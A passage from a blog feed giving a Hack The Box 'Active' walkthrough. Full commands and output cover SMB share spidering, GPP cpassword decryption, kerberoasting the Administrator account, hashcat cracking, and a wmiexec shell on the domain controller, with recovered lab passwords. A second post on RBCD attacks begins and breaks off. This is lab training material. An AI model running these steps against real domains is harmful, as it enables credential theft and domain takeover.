SPIDER_PLUS 10.129.10.151   445    DC               [*] SMB Readable Shares:  1 (Replication)
SPIDER_PLUS 10.129.10.151   445    DC               [*] Total folders found:  22
SPIDER_PLUS 10.129.10.151   445    DC               [*] Total files found:    7
SPIDER_PLUS 10.129.10.151   445    DC               [*] File size average:    1.16 KB
SPIDER_PLUS 10.129.10.151   445    DC               [*] File size min:        22 B
SPIDER_PLUS 10.129.10.151   445    DC               [*] File size max:        3.63 KB

&#9484;&#9472;&#9472;(byt3&#12927;LAPTOP)-[~]
&#9492;&#9472;$ sudo cat /root/.nxc/modules/nxc_spider_plus/10.129.10.151.json
{
    "Replication": {
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "23 B"
        },
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "119 B"
        },
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "1.07 KB"
        },
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "533 B"
        },
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "2.72 KB"
        },
        "active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "22 B"
        },
        "active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2018-07-21 17:37:44",
            "ctime_epoch": "2018-07-21 17:37:44",
            "mtime_epoch": "2018-07-21 17:38:11",
            "size": "3.63 KB"
        }
    }
}</code></pre></div><p>Let&#8217;s get that file.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ sudo smbclient \\\\dc.active.htb\\Replication -U
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Sat Jul 21 17:37:44 2018
  ..                                  D        0  Sat Jul 21 17:37:44 2018
  active.htb                          D        0  Sat Jul 21 17:37:44 2018

                5217023 blocks of size 4096. 235631 blocks available
smb: \&gt; cd active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&gt; ls
  .                                   D        0  Sat Jul 21 17:37:44 2018
  ..                                  D        0  Sat Jul 21 17:37:44 2018
  Groups.xml                          A      533  Thu Jul 19 03:46:06 2018

                5217023 blocks of size 4096. 235631 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&gt; get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&gt; exit

&#9484;&#9472;&#9472;(byt3&#12927;LAPTOP)-[~]
&#9492;&#9472;$ cat Groups.xml
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"&gt;&lt;User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"&gt;&lt;Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/&gt;&lt;/User&gt;
&lt;/Groups&gt;</code></pre></div><ol start="3"><li><p><em>GPP Password Recovery</em></p></li></ol><p>Gaining that XML files, we got encrypted password strings, along with the username for further enumeration/attack.</p><p>After some research, that&#8217;s password strings is GPP protected, we can recover it with gpp-decrypt tool:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18</code></pre></div><p>Now we have a pair for further attack.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">user: svc_tgs
passwd: GPPstillStandingStrong2k18</code></pre></div><ol start="4"><li><p><em>Kerberos Attack TGS Roasting to Administrator</em></p></li></ol><p>With that credentials, turns-out we can do kerberoasting and gain Administrator hashes, and crack it locally.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ sudo netexec ldap dc.active.htb -u svc_tgs -p GPPstillStandingStrong2k18 --kerberoasting out.hash
LDAP        10.129.10.151   389    DC               [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.10.151   389    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
LDAP        10.129.10.151   389    DC               [*] Skipping disabled account: krbtgt
LDAP        10.129.10.151   389    DC               [*] Total of records returned 1
LDAP        10.129.10.151   389    DC               [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb', 'CN=Enterprise Admins,CN=Users,DC=active,DC=htb', 'CN=Schema Admins,CN=Users,DC=active,DC=htb', 'CN=Administrators,CN=Builtin,DC=active,DC=htb'], pwdLastSet: 2018-07-19 02:06:40.351723, lastLogon: 2026-03-30 11:34:01.020566
LDAP        10.129.10.151   389    DC               $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$365be1d617ecacfb38f8ba17510a4830$49358c60a5c8987281615a406acd570d5925424ba11172eea4c43b4564047874d81871461f500825d591d8e3e3ce54efea7b2caf76716fa1ca5a0e297561215653b40bd4e4a2c0ea973b160fe226cbcf5628501a62d8039f1b1748cf11e3ff968844c8c16fe84954969931eac933ff946bb990e3548e485185e530c34d74abbee25dcfd516b4cb14c22a039778cf3d2eeced5e712908a42cea8278cabb271520a9cb6373ce9b6eeb2f99568fca227e425e9d42d250d571ef12e853570f0fd29670788eca5d65bb3ee9643a2f746ed9c549e52287242e1e3988fcce814092fa2eed519e7c9bc74da86fda0c3a61b8e5a0fb8962710f2c091387e326b74b829f09dac1af8902358d1327505ac31c4d10926e518d691b2c338c5ab1218e595c7180833c273f1c28f6d41d76b6ddf9d16cc559ffbe0e4cde0a787ec2924be638c1321ab4854f9f1728bb13d44d19400c64a4f97a12aeb044c94ece3cc6cb8b512856dd5bf4228aa1e8398f4817434802620f720bafdb4689423f75307fae4418c5afd83452118f25374bfd99248d2e8cd8228fa4b2e2101f3c1f9e57c86b3df03c6807d109bd164a72d42f699009d7ae7dcffc8dcecf07096a46c11f4355342f6ccc72d3ae380d2be6dc123a60376cbc3d53fc5b11d4989f82d390d6bf4713198ac3d88999d160b833e9b341576be0bb395896f6b6c001075e638253e6ee745edba4c5f73b80772e9d21b1e73c9e2b33026f587d9ada5148895727852db6ace2ee077de4baff21d9ce594c7c5ea028cb82027fe7090bb4be18fba30570cb39c96f1feba0b304ef4b38cbc43e1aa9f79e36f370f9d42912b8893f2415389489f1037aaf0737b9509b0e2e9998c81c3294ca9ecdaf6f380b1d6b7514dcd6c592736274dac39b26bf96eda3698722b3b565715770545057c9d21b7a8285f15ad7ca7bae480a693e1c0bf0a6a0571fc9971c49aa4d8089603e0edfbf24877c220bafab60dd5fcdeaf745748c31509549d9e8188923ff0d382c94ac1e86ceb191c2e419bfef5c783b2b9b178f81529614d05764e55682517f1fd648067fe4a755aba150031bc8f19d1accd2dbbc96ba89160eb9569808ff1826fc2c581ca7ad77c95cb2b032d29a0cb04f53b6687616b2f7ec9af06f501efcec3a8fbf94dc696def548eb9c49cfc608e64a9a78440c811020b04f3dcfacc956b2a8c83d6906f846bcc0e24a0e2747a19a28bcead485c465fbf9e6ceb6ee4cc6630cb31882a</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Y3ro!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Y3ro!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png 424w, https://substackcdn.com/image/fetch/$s_!Y3ro!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png 848w, https://substackcdn.com/image/fetch/$s_!Y3ro!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png 1272w, https://substackcdn.com/image/fetch/$s_!Y3ro!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Y3ro!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png" width="275" height="205" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:205,&quot;width&quot;:275,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:119976,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192576101?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Y3ro!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png 424w, https://substackcdn.com/image/fetch/$s_!Y3ro!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png 848w, https://substackcdn.com/image/fetch/$s_!Y3ro!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png 1272w, https://substackcdn.com/image/fetch/$s_!Y3ro!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c456fb9-c252-483f-b744-e96d89871e3d_275x205.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ hashcat -m 13100 out.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13650HX, 6902/13805 MB (2048 MB allocatable), 20MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 517 MB (14596 MB free)

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$365be1d617ecacfb38f8ba17510a4830$49358c60a5c8987281615a406acd570d5925424ba11172eea4c43b4564047874d81871461f500825d591d8e3e3ce54efea7b2caf76716fa1ca5a0e297561215653b40bd4e4a2c0ea973b160fe226cbcf5628501a62d8039f1b1748cf11e3ff968844c8c16fe84954969931eac933ff946bb990e3548e485185e530c34d74abbee25dcfd516b4cb14c22a039778cf3d2eeced5e712908a42cea8278cabb271520a9cb6373ce9b6eeb2f99568fca227e425e9d42d250d571ef12e853570f0fd29670788eca5d65bb3ee9643a2f746ed9c549e52287242e1e3988fcce814092fa2eed519e7c9bc74da86fda0c3a61b8e5a0fb8962710f2c091387e326b74b829f09dac1af8902358d1327505ac31c4d10926e518d691b2c338c5ab1218e595c7180833c273f1c28f6d41d76b6ddf9d16cc559ffbe0e4cde0a787ec2924be638c1321ab4854f9f1728bb13d44d19400c64a4f97a12aeb044c94ece3cc6cb8b512856dd5bf4228aa1e8398f4817434802620f720bafdb4689423f75307fae4418c5afd83452118f25374bfd99248d2e8cd8228fa4b2e2101f3c1f9e57c86b3df03c6807d109bd164a72d42f699009d7ae7dcffc8dcecf07096a46c11f4355342f6ccc72d3ae380d2be6dc123a60376cbc3d53fc5b11d4989f82d390d6bf4713198ac3d88999d160b833e9b341576be0bb395896f6b6c001075e638253e6ee745edba4c5f73b80772e9d21b1e73c9e2b33026f587d9ada5148895727852db6ace2ee077de4baff21d9ce594c7c5ea028cb82027fe7090bb4be18fba30570cb39c96f1feba0b304ef4b38cbc43e1aa9f79e36f370f9d42912b8893f2415389489f1037aaf0737b9509b0e2e9998c81c3294ca9ecdaf6f380b1d6b7514dcd6c592736274dac39b26bf96eda3698722b3b565715770545057c9d21b7a8285f15ad7ca7bae480a693e1c0bf0a6a0571fc9971c49aa4d8089603e0edfbf24877c220bafab60dd5fcdeaf745748c31509549d9e8188923ff0d382c94ac1e86ceb191c2e419bfef5c783b2b9b178f81529614d05764e55682517f1fd648067fe4a755aba150031bc8f19d1accd2dbbc96ba89160eb9569808ff1826fc2c581ca7ad77c95cb2b032d29a0cb04f53b6687616b2f7ec9af06f501efcec3a8fbf94dc696def548eb9c49cfc608e64a9a78440c811020b04f3dcfacc956b2a8c83d6906f846bcc0e24a0e2747a19a28bcead485c465fbf9e6ceb6ee4cc6630cb31882a:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Ad...31882a
Time.Started.....: Mon Mar 30 11:46:53 2026 (2 secs)
Time.Estimated...: Mon Mar 30 11:46:55 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  5205.5 kH/s (1.67ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10547200/14344385 (73.53%)
Rejected.........: 0/10547200 (0.00%)
Restore.Point....: 10526720/14344385 (73.39%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Tutzi2400 -&gt; Tahlia2003
Hardware.Mon.#01.: Util: 46%

Started:
Stopped:

&#9484;&#9472;&#9472;(byt3&#12927;LAPTOP)-[~]
&#9492;&#9472;$ hashcat -m 13100 out.hash /usr/share/wordlists/rockyou.txt --show
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$365be1d617ecacfb38f8ba17510a4830$49358c60a5c8987281615a406acd570d5925424ba11172eea4c43b4564047874d81871461f500825d591d8e3e3ce54efea7b2caf76716fa1ca5a0e297561215653b40bd4e4a2c0ea973b160fe226cbcf5628501a62d8039f1b1748cf11e3ff968844c8c16fe84954969931eac933ff946bb990e3548e485185e530c34d74abbee25dcfd516b4cb14c22a039778cf3d2eeced5e712908a42cea8278cabb271520a9cb6373ce9b6eeb2f99568fca227e425e9d42d250d571ef12e853570f0fd29670788eca5d65bb3ee9643a2f746ed9c549e52287242e1e3988fcce814092fa2eed519e7c9bc74da86fda0c3a61b8e5a0fb8962710f2c091387e326b74b829f09dac1af8902358d1327505ac31c4d10926e518d691b2c338c5ab1218e595c7180833c273f1c28f6d41d76b6ddf9d16cc559ffbe0e4cde0a787ec2924be638c1321ab4854f9f1728bb13d44d19400c64a4f97a12aeb044c94ece3cc6cb8b512856dd5bf4228aa1e8398f4817434802620f720bafdb4689423f75307fae4418c5afd83452118f25374bfd99248d2e8cd8228fa4b2e2101f3c1f9e57c86b3df03c6807d109bd164a72d42f699009d7ae7dcffc8dcecf07096a46c11f4355342f6ccc72d3ae380d2be6dc123a60376cbc3d53fc5b11d4989f82d390d6bf4713198ac3d88999d160b833e9b341576be0bb395896f6b6c001075e638253e6ee745edba4c5f73b80772e9d21b1e73c9e2b33026f587d9ada5148895727852db6ace2ee077de4baff21d9ce594c7c5ea028cb82027fe7090bb4be18fba30570cb39c96f1feba0b304ef4b38cbc43e1aa9f79e36f370f9d42912b8893f2415389489f1037aaf0737b9509b0e2e9998c81c3294ca9ecdaf6f380b1d6b7514dcd6c592736274dac39b26bf96eda3698722b3b565715770545057c9d21b7a8285f15ad7ca7bae480a693e1c0bf0a6a0571fc9971c49aa4d8089603e0edfbf24877c220bafab60dd5fcdeaf745748c31509549d9e8188923ff0d382c94ac1e86ceb191c2e419bfef5c783b2b9b178f81529614d05764e55682517f1fd648067fe4a755aba150031bc8f19d1accd2dbbc96ba89160eb9569808ff1826fc2c581ca7ad77c95cb2b032d29a0cb04f53b6687616b2f7ec9af06f501efcec3a8fbf94dc696def548eb9c49cfc608e64a9a78440c811020b04f3dcfacc956b2a8c83d6906f846bcc0e24a0e2747a19a28bcead485c465fbf9e6ceb6ee4cc6630cb31882a:Ticketmaster1968</code></pre></div><p>And we got the Admin password for logon:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;17113c4b-bf92-4a05-876a-1237c3a2c7b8&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">user: administrator
passwd: Ticketmaster1968</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ sudo netexec smb dc.active.htb -u administrator -p Ticketmaster1968
SMB         10.129.10.151   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.10.151   445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)</code></pre></div><p>That&#8217;s it.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9492;&#9472;$ sudo impacket-wmiexec administrator:Ticketmaster1968@DC
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\&gt;whoami
active\administrator

C:\&gt;</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uW-M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uW-M!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png 424w, https://substackcdn.com/image/fetch/$s_!uW-M!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png 848w, https://substackcdn.com/image/fetch/$s_!uW-M!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png 1272w, https://substackcdn.com/image/fetch/$s_!uW-M!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uW-M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png" width="880" height="463" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:463,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:209426,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192576101?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uW-M!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png 424w, https://substackcdn.com/image/fetch/$s_!uW-M!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png 848w, https://substackcdn.com/image/fetch/$s_!uW-M!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png 1272w, https://substackcdn.com/image/fetch/$s_!uW-M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8a6d7f9f-84de-4d3e-9453-2ad3862eaa17_880x463.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/machine/2489228/148">labs.hackthebox.com/achievement/machine/2489228/148</a></p></li></ul><p>Until next time and Happy Hacking, together we make the Internet more bleeding!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[Practical RBCD Exploitation with Only: NetExec and Impacket]]></title><description><![CDATA[Another practical Kerberos type attack, just practical simplicity of swiss army knife in Pentesting for RBCD attack with only 2-3 Tools.]]></description><link>https://byt3n33dl3.substack.com/p/practical-rbcd-exploitation-with</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/practical-rbcd-exploitation-with</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Sun, 29 Mar 2026 02:34:04 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/f8062c91-aee2-4ba8-a4d2-55ccb53ac5c8_625x377.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>RBCD</h2><p>In this, RBCD in the right conditions it allows users to take control of computers and domains through the simple use of the very mechanics of the Kerberos authentication protocol.</p><p>On a situation, we might find a trail of this attack-paths.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc.phantom.vl -u wsilva -p passw0rd
